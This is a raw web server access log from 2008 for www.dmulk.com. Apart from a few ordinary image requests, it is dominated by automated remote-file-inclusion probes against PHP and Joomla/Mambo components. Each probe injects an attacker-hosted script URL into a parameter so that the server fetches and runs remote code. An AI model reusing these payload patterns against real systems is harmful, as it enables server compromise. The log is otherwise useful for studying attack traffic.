68.219.254.82 - - [02/May/2008:10:07:48 -0700] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:48 -0700] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:49 -0700] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:49 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:50 -0700] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:50 -0700] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:52 -0700] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:07:52 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:08:14 -0700] "GET /logs/access.log/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:08:18 -0700] "GET /index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:08:19 -0700] "GET /logs/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:10:08:24 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.29.89.97 - - [02/May/2008:10:08:25 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:10:08:34 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:10:09:18 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:10:09:18 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:10:09:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
193.254.184.125 - - [02/May/2008:10:09:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:09:27 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:09:28 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.219.254.82 - - [02/May/2008:10:09:31 -0700] "GET /bikes/dteel/2008_02_23/IMG_4573s.JPG HTTP/1.1" 200 240669 "http://www.st-owners.com/forums/showthread.php?t=32353&page=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:10:09:49 -0700] "GET /logs/access_080215.log//?pag=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:09:54 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:09:55 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:10:04 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:10:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:10:08 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:10:10:18 -0700] "GET /logs/str.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.182.225.143 - - [02/May/2008:10:10:19 -0700] "GET /str.php?p=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:10:19 -0700] "GET /logs/access_080113.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:10:19 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:10:19 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:10:20 -0700] "GET /logs/access_071201.log/port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:10:23 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:10:24 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:10:25 -0700] "GET /port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:10:26 -0700] "GET /logs/port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [02/May/2008:10:10:34 -0700] "GET /logs/access_080304.log/modules/vwar/admin/admin.php?vwar_root=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:10:45 -0700] "GET /logs/index2.php?url_page=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:10:45 -0700] "GET /index2.php?url_page=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:10:55 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:10:55 -0700] "GET /homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:10:56 -0700] "GET /logs/homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:11:00 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:00 -0700] "GET /logs/index1.php?dat=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:01 -0700] "GET /index1.php?dat=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:02 -0700] "GET /logs/port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:03 -0700] "GET /port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:11:17 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:11:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.149.245.109 - - [02/May/2008:10:11:28 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:29 -0700] "GET /logs/access_080207.log/port.php?content=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:30 -0700] "GET /logs/access_080214.log/index1.php?site=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:30 -0700] "GET /index1.php?site=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:31 -0700] "GET /logs/index1.php?site=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:32 -0700] "GET /logs/access_080215.log/index1.php?site=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:58 -0700] "GET /logs/access_080313.log/index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:11:58 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:58 -0700] "GET /index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:10:11:59 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:11:59 -0700] "GET /logs/index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.149.245.109 - - [02/May/2008:10:12:24 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:12:38 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:12:38 -0700] "GET /homepage.php?sel=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:12:39 -0700] "GET /logs/homepage.php?sel=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:12:43 -0700] "GET /logs/homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.84.169 - - [02/May/2008:10:12:43 -0700] "GET /homepage.php?sel=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:12:45 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:13:02 -0700] "GET /logs/access_080220.log/index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:13:14 -0700] "GET /logs/index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:13:15 -0700] "GET /index1.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:13:15 -0700] "GET /logs/access_080106.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
140.113.4.81 - - [02/May/2008:10:13:15 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
140.113.4.81 - - [02/May/2008:10:13:15 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
62.141.56.138 - - [02/May/2008:10:13:48 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.138 - - [02/May/2008:10:13:49 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:14:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:14:08 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:14:15 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:14:15 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:17 -0700] "GET /logs/access_080304.log/main.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:17 -0700] "GET /main.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:17 -0700] "GET /logs/main.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:15:42 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:49 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:49 -0700] "GET /index2.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:15:50 -0700] "GET /logs/index2.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:16:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:10:16:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:11 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:13 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:18:14 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:14 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:18:15 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:15 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:16 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:18:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.112.119.22 - - [02/May/2008:10:18:26 -0700] "GET /logs/access.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "www.dmulk.com"
213.215.80.102 - - [02/May/2008:10:18:32 -0700] "GET /logs/access_080304.log/index2.php?x=http://www.loichua.org/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.150.97 - - [02/May/2008:10:19:08 -0700] "GET /logs/access_080218.log//components/com_simpleboard/file_upload.php?sbp=http://perpetuallyconfused.com/games/admin/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.121.128.18 - - [02/May/2008:10:19:24 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:19:30 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:19:31 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:19:31 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:19:58 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:19:58 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:19:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:10:22:52 -0700] "GET /logs/access_080218.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:23:13 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:23:14 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:23:15 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:10:23:18 -0700] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [02/May/2008:10:23:24 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.khalilshahr.com/templates/%20%20%20%20%20%20%20/sistem%20/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:10:23:27 -0700] "GET /logs/access_080321.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:23:59 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:25:05 -0700] "GET /logs/access_080224.log/components/com_performs/performs.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:25:46 -0700] "GET /logs/access.log//browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:25:47 -0700] "GET //browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:25:47 -0700] "GET /logs//browse.php/header.php?prefix=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:25:55 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:10:26:04 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:26:09 -0700] "GET /logs/access_080113.log/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:26:09 -0700] "GET /content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:26:09 -0700] "GET /logs/content.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
